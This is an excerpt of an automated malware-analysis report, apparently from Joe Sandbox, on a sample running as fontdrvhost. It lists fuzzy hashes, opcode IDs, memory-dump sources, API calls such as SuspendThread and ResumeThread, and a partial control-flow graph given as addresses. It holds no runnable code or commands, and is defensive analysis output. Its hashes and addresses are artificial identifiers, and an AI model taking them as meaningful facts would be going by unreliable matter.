                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb70a15de6585db8add506b4dcba774ca93ae355f5155ec5c2e598688597bff0
                                                                    • Instruction ID: 5427b110fa0ebef080722405d89d7365576bfa4ed664d63f69a1142a63eb570c
                                                                    • Opcode Fuzzy Hash: fb70a15de6585db8add506b4dcba774ca93ae355f5155ec5c2e598688597bff0
                                                                    • Instruction Fuzzy Hash: 49014C30908A8C8FCB45EF68C869A997FF0FF69301F0601AAE449D71A1D7749A94CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA66250 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d5ca601035401ff0b9106d94ec89c9b5fa4825d3172ff8dc520c4ed251fdaffe
                                                                    • Instruction ID: 9cda65b3d74d5ee7cd294818d58d6a1fb37dd189b07de1de7e26f9814bf1cac8
                                                                    • Opcode Fuzzy Hash: d5ca601035401ff0b9106d94ec89c9b5fa4825d3172ff8dc520c4ed251fdaffe
                                                                    • Instruction Fuzzy Hash: FD01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00056AA85DD3264DB71E594CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA66110 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f092b89cb36c470110e2aa4a73b53a619a30db169a6878e3e6debd28dee1610f
                                                                    • Instruction ID: 134b87ba6a565abfffa0aa259eb8f5ddc57c55e139c938a92775c8563c4d24c2
                                                                    • Opcode Fuzzy Hash: f092b89cb36c470110e2aa4a73b53a619a30db169a6878e3e6debd28dee1610f
                                                                    • Instruction Fuzzy Hash: 7801A870914A4D9FDF84EF68C849AEE7BF0FB68305F00056AA85DD3260DB71E694CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA63549 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c56eccfc656b8e973dfc67861853442708201ba9d4e3ef66baeb3f02ebe4ac94
                                                                    • Instruction ID: 570d6c1dc3c992c8fcd4e898c968a8b447244bd2eff2fd71d823361f9a7952e6
                                                                    • Opcode Fuzzy Hash: c56eccfc656b8e973dfc67861853442708201ba9d4e3ef66baeb3f02ebe4ac94
                                                                    • Instruction Fuzzy Hash: BF01407090968DCFCB85DF58C8546A97BF1FF29300F05019AD419C71A2D7749954CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA28E25 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebcea49ff4b3e6edb30eee7e05d543372c2ab0872856939891abeaeda2977d38
                                                                    • Instruction ID: b6e73b6fdc8098d430be3702b30a3797c336937493a537601d5e23ca64c19f1d
                                                                    • Opcode Fuzzy Hash: ebcea49ff4b3e6edb30eee7e05d543372c2ab0872856939891abeaeda2977d38
                                                                    • Instruction Fuzzy Hash: 1E014B7191964C8FDB45EF28C8515E93BB0FF68315F5502AAF848C32A1D734EA54CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5B119 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42d3b6ed7f4e3fad1448092a12e9e1d2f902d49054b62a887fef3d4fe4a84dec
                                                                    • Instruction ID: caebe633962a5995de6a0fc2a50f5a76f71572231a8a93e7687a6f363351e80b
                                                                    • Opcode Fuzzy Hash: 42d3b6ed7f4e3fad1448092a12e9e1d2f902d49054b62a887fef3d4fe4a84dec
                                                                    • Instruction Fuzzy Hash: 1401713090968C8FCF85EF64C864AA97FB0FF25301F4500DAE449C71A2D7749554CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA69AD9 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d270dc113d78e9273dfcfac49c9c53d425031652d20ec328e71bed7fad7cf92a
                                                                    • Instruction ID: 0705b21b7f68318af5cc571442d3da8ecdc1a2e1e68e8fa14bc878af3ad91016
                                                                    • Opcode Fuzzy Hash: d270dc113d78e9273dfcfac49c9c53d425031652d20ec328e71bed7fad7cf92a
                                                                    • Instruction Fuzzy Hash: C5015A70A08A8D8FDF85EF68C868AA97BF0FF29300F0504ABD418C71A2DB749954CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA6A6C9 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70dc49173dc0a3a70aed1f94c8f5900603e8d7ed6a03485770723b10bb6c8a3c
                                                                    • Instruction ID: e98dfdd03e503cbdbd3d3d89ee69e4b7ec4802941ea7f45f99a1035bcbb45612
                                                                    • Opcode Fuzzy Hash: 70dc49173dc0a3a70aed1f94c8f5900603e8d7ed6a03485770723b10bb6c8a3c
                                                                    • Instruction Fuzzy Hash: 17014F7190968C8FCB95DF64C894ADD7FB0FF65300F0501DAE459C71A1D775A954CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA62C79 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5409642b23cddce5fcf2e22ada1a9ed551b93d3d1424217aabefa28ed75f1eff
                                                                    • Instruction ID: ba57752d3b8a9586a8815e42712b1fcf59f3e1d3860187a6ab185201575ff11a
                                                                    • Opcode Fuzzy Hash: 5409642b23cddce5fcf2e22ada1a9ed551b93d3d1424217aabefa28ed75f1eff
                                                                    • Instruction Fuzzy Hash: 7601A27190968C8FCB85DF54C894AE97FB0FF69300F0500DAE409C71A1D7749A94CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA3159F Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction ID: 0a4998cd1825820a9391cd3dc146169900a15715636d504fd2521edb071ad27e
                                                                    • Opcode Fuzzy Hash: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction Fuzzy Hash: BE01C030D0834D8FEB54DF95C8585ED7BB1EF15310F14427EC425972A6DA74A906CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA64879 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d4821acd004ab0f26a3d402a890dc5bc79c4a76cbd1ee3ca0d877cf75bbbf21
                                                                    • Instruction ID: ced90b726cad40df2ce242704e9e399a4239e2b285292b491022b3179ae1c59e
                                                                    • Opcode Fuzzy Hash: 5d4821acd004ab0f26a3d402a890dc5bc79c4a76cbd1ee3ca0d877cf75bbbf21
                                                                    • Instruction Fuzzy Hash: 8F018F7190968DCFCB85DF64C8546ED7BB0FF25300F05019AD418C71A2DB349A44CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA6A789 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 059c80b4286a8817d294a938abd6267fc214bcd4e0de39cd9e0dae5e0dbfc6ff
                                                                    • Instruction ID: 8a8055ffafffb87d5cdc717c6477f2a6d896f2741798a68acc392bbd861ad726
                                                                    • Opcode Fuzzy Hash: 059c80b4286a8817d294a938abd6267fc214bcd4e0de39cd9e0dae5e0dbfc6ff
                                                                    • Instruction Fuzzy Hash: 42018F7090868C8FCB85DF24C868A997FF0FF55300F0500EAD409C71A2D7759954CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5D7F0 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0cc7ec3369932692ccbebbf2e2a164ca6e70588988d0f8c1d2ecd4afb9c0e84
                                                                    • Instruction ID: b4a06f232a46bfffff5914f0eed6687c54de7d1ab6484895218d4f00a1e53c2b
                                                                    • Opcode Fuzzy Hash: a0cc7ec3369932692ccbebbf2e2a164ca6e70588988d0f8c1d2ecd4afb9c0e84
                                                                    • Instruction Fuzzy Hash: 66F0EC30914A4D9FDF44EF58C859AE97BF0FB68305F00456AA85DD3250DB30A694CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1670C Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a09f50adfc75588805bbaef93122d5fe615db1cfee41c67bffdc149ca2585e8f
                                                                    • Instruction ID: 0f970cd56a5f25fdb1300ff3c64a6a0ecdcdfc0bfa7b2b52f70ce09caf473c1c
                                                                    • Opcode Fuzzy Hash: a09f50adfc75588805bbaef93122d5fe615db1cfee41c67bffdc149ca2585e8f
                                                                    • Instruction Fuzzy Hash: 7D012930A0555E8FEBB4EB18C8987F9B3B1EF54302F1082F6D41DA2299DA742E81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5B130 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 824ae1838e332e8b5cd7f8c154ad94833c5e9d00e0a300b0e8f9b7db70a70a0c
                                                                    • Instruction ID: 7a70b6367e02ad908ee74ddb566512640904efa81408c1221debc5bede65459b
                                                                    • Opcode Fuzzy Hash: 824ae1838e332e8b5cd7f8c154ad94833c5e9d00e0a300b0e8f9b7db70a70a0c
                                                                    • Instruction Fuzzy Hash: CDF0BD3091490D9FDF84EF68C498AAA7BF1FB68305F50419AA41DD32A0DB719694CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2863D Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04f7f83a68e4f50346af384cc2447061e9f89d51487e5dd1ab1445e338f01b89
                                                                    • Instruction ID: 2474b71bcb26ec5a54b8083109143fc3132b77f1efb3859a458b7ae5bad5a55b
                                                                    • Opcode Fuzzy Hash: 04f7f83a68e4f50346af384cc2447061e9f89d51487e5dd1ab1445e338f01b89
                                                                    • Instruction Fuzzy Hash: 95F09A3090968DCFCB94EF18C8A5ADA3BE0FF28300F0501A6E858C7162D774E9A0CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA61FC8 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 880677bd27ec95036ed7989b8e529f777f18915092ec2a662d2ea627fcb28cd8
                                                                    • Instruction ID: 47842fc4b72e1ded867ffe1289f465ed7e016a10776dab215a5e9bd5056aa0e6
                                                                    • Opcode Fuzzy Hash: 880677bd27ec95036ed7989b8e529f777f18915092ec2a662d2ea627fcb28cd8
                                                                    • Instruction Fuzzy Hash: 5EF0BD70914A4D9FDF94EF54C454AEA7BB0FF58305F1041AAE41DD3260DB71A694CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA67B38 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 298e9034b8cc6826a9079cf4814ab5b5f40cc6dfe2988624cfed520e4d5e1f1f
                                                                    • Instruction ID: 1afad90637a74c26745a875a92f8b922dff26f1b7999b700c4195162c58be19d
                                                                    • Opcode Fuzzy Hash: 298e9034b8cc6826a9079cf4814ab5b5f40cc6dfe2988624cfed520e4d5e1f1f
                                                                    • Instruction Fuzzy Hash: 99F01D7090490D9FCF94EF54C494AAA7BF0FF68304F1140AAE41DD3260DB71A690CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA314B9 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfa1dcafff2f0d16f4cf50fd4296eb32325cf09fc6c0d0a9c7ea0180b71b0917
                                                                    • Instruction ID: 44fd8e382d1352a1c4a279db0f8fce6a33b31adecb0d18acac3fea726eef7fce
                                                                    • Opcode Fuzzy Hash: cfa1dcafff2f0d16f4cf50fd4296eb32325cf09fc6c0d0a9c7ea0180b71b0917
                                                                    • Instruction Fuzzy Hash: ABF01270D4E21D8EEB70DBF584542FCBAF0AF15301F31057AD00A931A7D67896448F00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA66201 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ffe8383090676719d9fa534f0561d664ce99d0014e011123dc6a56bdc51229e
                                                                    • Instruction ID: 0ed4c333f376ecc8475e96671c7002fcc5b567101b123b2d2ee726c4f41e5bec
                                                                    • Opcode Fuzzy Hash: 5ffe8383090676719d9fa534f0561d664ce99d0014e011123dc6a56bdc51229e
                                                                    • Instruction Fuzzy Hash: 45E0927190484DDFDF50DF98D886ADD3BB0FF10700F404065F508D7161DA34E5508780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA359FB Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9de656d7c6931718515f53e44f8f1df90224b5589a59b66bde3d8e5166319772
                                                                    • Instruction ID: c3bcb37d9a0e7cb2f76c580e0c97644a43d9b1c386f62144315301d941fcd5de
                                                                    • Opcode Fuzzy Hash: 9de656d7c6931718515f53e44f8f1df90224b5589a59b66bde3d8e5166319772
                                                                    • Instruction Fuzzy Hash: B0E03071E5960D4EEB64DB9888756E963A1FF88390F0100B5D40DC62A2CD6829418F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA62D05 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b60e7314e0e7a6917b7b76d5cb5e281fd5fa7f9e58c14a2e6a8d8c62b95c830
                                                                    • Instruction ID: 76813d03dca60a1f9f463ae4a4a7812467bdf3c79f6ba350c0620e786a7d1446
                                                                    • Opcode Fuzzy Hash: 9b60e7314e0e7a6917b7b76d5cb5e281fd5fa7f9e58c14a2e6a8d8c62b95c830
                                                                    • Instruction Fuzzy Hash: EDD0237650B28ECFE7224FE09D394FD3F10DF4251570F01A5E4BD0B4329951E5144290
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA30A34 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 304aedf782e6912f1dc6282bd3a5a6be04ee421e90ac0fb8096d2f30875047d6
                                                                    • Instruction ID: 4c024d61ca081558519ce34f7c1940be14d1e3255095e7c28370a500408f3bb9
                                                                    • Opcode Fuzzy Hash: 304aedf782e6912f1dc6282bd3a5a6be04ee421e90ac0fb8096d2f30875047d6
                                                                    • Instruction Fuzzy Hash: FCE08630E2851E5BEB54DB68D4A0BFE3BF1EF54600F000074E45992296CE242801CB04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA12303 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05765196e01142898ae2eb440d506bb49c41ce17730a00d0ae9cdbaf278e5045
                                                                    • Instruction ID: a69507d38429f46e35a784b6e37325e2fab7bc4827afe9978630dcb265c5d295
                                                                    • Opcode Fuzzy Hash: 05765196e01142898ae2eb440d506bb49c41ce17730a00d0ae9cdbaf278e5045
                                                                    • Instruction Fuzzy Hash: 71E01270E0A21D8EEBB4AB50C8547AC7371EB54300F1050F9D50E62290CA781B80CF05
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA672A7 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f57375be7e105ee6ef306c5d7a77a2f3e95b623cfb3729299eb648c27aba2c3
                                                                    • Instruction ID: a72ca1cc90bcebccd1f6c4f9f21dfddf72c815ce8b333596d279d4392ea09854
                                                                    • Opcode Fuzzy Hash: 2f57375be7e105ee6ef306c5d7a77a2f3e95b623cfb3729299eb648c27aba2c3
                                                                    • Instruction Fuzzy Hash: 7DD0A9B0E2691DCEFBA18B6888697A123E1FB18300F0001AA940883212CA306942CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:4.7%
                                                                    Dynamic/Decrypted Code Coverage:83.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:12
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 24284 7ffd9bbe02f9 24285 7ffd9bbe0307 FindCloseChangeNotification 24284->24285 24287 7ffd9bbe03e4 24285->24287 24288 7ffd9bbe1f85 24289 7ffd9bbe1f9f GetFileAttributesW 24288->24289 24291 7ffd9bbe2065 24289->24291 24276 7ffd9bbdeaad 24277 7ffd9bbdeabb SuspendThread 24276->24277 24279 7ffd9bbdeb94 24277->24279 24280 7ffd9bbe01df 24281 7ffd9bbe0212 ResumeThread 24280->24281 24283 7ffd9bbe02a4 24281->24283

                                                                    Executed Functions

                                                                    Function 00007FFD9C1078B0 Relevance: .9, Instructions: 875COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 323 7ffd9c1078b0-7ffd9c1078ca 324 7ffd9c107ecc-7ffd9c107eda 323->324 325 7ffd9c1078d0-7ffd9c1078e0 323->325 328 7ffd9c107edc 324->328 329 7ffd9c107ee1-7ffd9c107ef0 324->329 326 7ffd9c107f2a-7ffd9c107f77 325->326 327 7ffd9c1078e6-7ffd9c107921 325->327 334 7ffd9c107f79-7ffd9c107f9d 326->334 335 7ffd9c107fc1-7ffd9c10801c 326->335 332 7ffd9c1079ba-7ffd9c1079c2 327->332 328->329 336 7ffd9c1079c8 332->336 337 7ffd9c107926-7ffd9c10792f 332->337 347 7ffd9c108066-7ffd9c10806b 335->347 348 7ffd9c10801e-7ffd9c108042 335->348 340 7ffd9c1079d2-7ffd9c1079ef 336->340 337->326 338 7ffd9c107935-7ffd9c107940 337->338 341 7ffd9c1079ca-7ffd9c1079ce 338->341 342 7ffd9c107946-7ffd9c10795a 338->342 344 7ffd9c1079f6-7ffd9c107a07 340->344 341->340 345 7ffd9c10795c-7ffd9c107973 342->345 346 7ffd9c1079b3-7ffd9c1079b7 342->346 356 7ffd9c107a09-7ffd9c107a1e 344->356 357 7ffd9c107a20-7ffd9c107a2f 344->357 345->326 349 7ffd9c107979-7ffd9c107985 345->349 346->332 350 7ffd9c10806d 347->350 351 7ffd9c108074-7ffd9c10812b 347->351 354 7ffd9c107987-7ffd9c10799b 349->354 355 7ffd9c10799f-7ffd9c1079b0 349->355 350->351 379 7ffd9c10812d-7ffd9c108136 call 7ffd9c1063f0 351->379 354->345 359 7ffd9c10799d 354->359 355->346 356->357 366 7ffd9c107a51-7ffd9c107abe 357->366 367 7ffd9c107a31-7ffd9c107a4c 357->367 359->346 381 7ffd9c107ac0-7ffd9c107ad3 366->381 382 7ffd9c107b0f-7ffd9c107b10 366->382 376 7ffd9c107e89-7ffd9c107eba 367->376 390 7ffd9c107ebc-7ffd9c107ec6 376->390 389 7ffd9c108117-7ffd9c10811d 379->389 381->326 386 7ffd9c107ad9-7ffd9c107b07 381->386 384 7ffd9c107b17-7ffd9c107b56 382->384 394 7ffd9c107b5a 